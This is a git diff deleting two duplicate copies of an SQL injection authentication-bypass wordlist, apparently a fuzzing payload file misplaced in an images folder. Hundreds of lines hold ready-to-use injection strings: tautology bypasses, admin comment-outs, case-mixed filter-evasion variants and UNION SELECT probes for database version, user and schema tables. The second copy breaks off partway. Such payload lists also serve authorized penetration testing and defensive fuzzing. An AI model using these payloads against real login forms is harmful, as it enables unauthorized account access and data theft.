diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
